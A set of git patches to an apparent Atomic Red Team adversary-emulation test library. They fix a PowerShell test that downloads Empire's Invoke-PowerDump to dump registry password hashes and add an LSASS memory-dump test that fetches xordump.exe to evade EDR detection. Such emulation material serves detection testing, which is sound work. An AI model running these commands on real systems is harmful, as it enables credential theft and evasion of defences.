From 7d494dcbce336fbefea9b2d63d54b7205bf99bf7 Mon Sep 17 00:00:00 2001 From: tjgeorgen <67936042+tjgeorgen@users.noreply.github.com> Date: Tue, 18 May 2021 10:51:47 -0400 Subject: [PATCH 1/5] Fix file path for PowerDump Import (#1466) seemed to download the module to $Env:Temp then run from .\, so I changed both to $Env:Temp --- atomics/T1003.002/T1003.002.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index 081107a1..958fac22 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -94,7 +94,7 @@ atomic_tests: Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" - Import-Module .\PowerDump.ps1 + Import-Module "$Env:Temp\PowerDump.ps1" Invoke-PowerDump name: powershell elevation_required: true From 6a570c2a4630cf0c2bd41a2e8375b5d5ab92f700 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 18 May 2021 14:52:23 +0000 Subject: [PATCH 2/5] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1003.002/T1003.002.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 71ce48ba..8a0b2d2b 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -22732,7 +22732,7 @@ credential-access: Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" - Import-Module .\PowerDump.ps1 + Import-Module "$Env:Temp\PowerDump.ps1" Invoke-PowerDump name: powershell elevation_required: true diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index d2b817bc..1516c1da 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -179,7 +179,7 @@ Executes a hashdump by reading the hasshes from the registry. Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" -Import-Module .\PowerDump.ps1 +Import-Module "$Env:Temp\PowerDump.ps1" Invoke-PowerDump ``` From bba82c0d5e3c52f076e6b3b0f30af28775bd139f Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Tue, 18 May 2021 11:23:39 -0400 Subject: [PATCH 3/5] adds additional lsass dump test (#1467) Co-authored-by: Carrie Roberts --- atomics/T1003.001/T1003.001.yaml | 35 ++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 2014b6e2..4e5ee4cc 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -138,6 +138,7 @@ atomic_tests: del C:\windows\temp\dumpert.dmp >nul 2> nul name: command_prompt elevation_required: true + - name: Dump LSASS.exe Memory using Windows Task Manager auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607 description: | @@ -158,6 +159,7 @@ atomic_tests: 3. Dump lsass.exe memory: Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file. name: manual + - name: Offline Credential Theft With Mimikatz auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023 description: | @@ -354,3 +356,36 @@ atomic_tests: del #{output_file} name: powershell elevation_required: true + +- name: Dump LSASS.exe using imported Microsoft DLLs + description: | + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by + importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump + file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. + + Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. + supported_platforms: + - windows + input_arguments: + xordump_exe: + description: Path to xordump + type: Path + default: C:\Windows\Temp\xordump.exe + output_file: + description: Path where resulting dump should be placed + type: Path + default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp + dependencies: + - description: | + Computer must have xordump.exe + prereq_command: | + if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} + executor: + command: | + #{xordump_exe} -out #{output_file} -x 0x41 + cleanup_command: | + Remove-Item ${output_file} -ErrorAction Ignore + name: powershell + elevation_required: true From da2dd2b06b04c9bae5f8b034f28abe9ce576e3e0 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 18 May 2021 15:24:12 +0000 Subject: [PATCH 4/5] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.001/T1003.001.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 4e5ee4cc..eb902b08 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -358,6 +358,7 @@ atomic_tests: elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs + auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 description: | The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index eba1dedd..d80b426b 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -692,3 +692,4 @@ c75612b2-9de0-4d7c-879c-10d7b077072d e86f1b4b-fcc1-4a2a-ae10-b49da01458db 10447c83-fc38-462a-a936-5102363b1c43 fcbdd43f-f4ad-42d5-98f3-0218097e2720 +86fc3f40-237f-4701-b155-81c01c48d697 From e1989f2bec465a65e86ca62d422a66aaf16d233f Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 18 May 2021 15:24:18 +0000 Subject: [PATCH 5/5] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 37 +++++++++++++ atomics/T1003.001/T1003.001.md | 52 +++++++++++++++++++ 6 files changed, 93 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 8a3b34df..5381987b 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -228,6 +228,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell +credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 2a0d36ac..aed4c67a 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -26,6 +26,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell +credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index d9a87458..d3f145a5 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -450,6 +450,7 @@ - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows] - Atomic Test #10: Powershell Mimikatz [windows] - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows] + - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d2bd5efb..c3d3acfa 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -50,6 +50,7 @@ - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows] - Atomic Test #10: Powershell Mimikatz [windows] - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows] + - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8a0b2d2b..9c28f3bc 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -20953,6 +20953,43 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'del #{output_file} +' + name: powershell + elevation_required: true + - name: Dump LSASS.exe using imported Microsoft DLLs + auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 + description: "The memory of lsass.exe is often dumped for offline credential + theft attacks. This can be achieved by\nimporting built-in DLLs and calling + exported functions. Xordump will re-read the resulting minidump \nfile and + delete it immediately to avoid brittle EDR detections that signature lsass + minidump files.\n\nUpon successful execution, you should see the following + file created $env:TEMP\\lsass-xordump.t1003.001.dmp.\n" + supported_platforms: + - windows + input_arguments: + xordump_exe: + description: Path to xordump + type: Path + default: C:\Windows\Temp\xordump.exe + output_file: + description: Path where resulting dump should be placed + type: Path + default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp + dependencies: + - description: 'Computer must have xordump.exe + +' + prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} + +' + get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" + -OutFile #{xordump_exe} + +' + executor: + command: "#{xordump_exe} -out #{output_file} -x 0x41\n" + cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore + ' name: powershell elevation_required: true diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index aad552e0..26822e04 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -48,6 +48,8 @@ The following SSPs can be used to access credentials: - [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe) +- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls) +
@@ -564,4 +566,54 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec +
+
+ +## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs +The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by +importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump +file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. + +Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| xordump_exe | Path to xordump | Path | C:\Windows\Temp\xordump.exe| +| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +#{xordump_exe} -out #{output_file} -x 0x41 +``` + +#### Cleanup Commands: +```powershell +Remove-Item ${output_file} -ErrorAction Ignore +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Computer must have xordump.exe +##### Check Prereq Commands: +```powershell +if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} +``` + + + +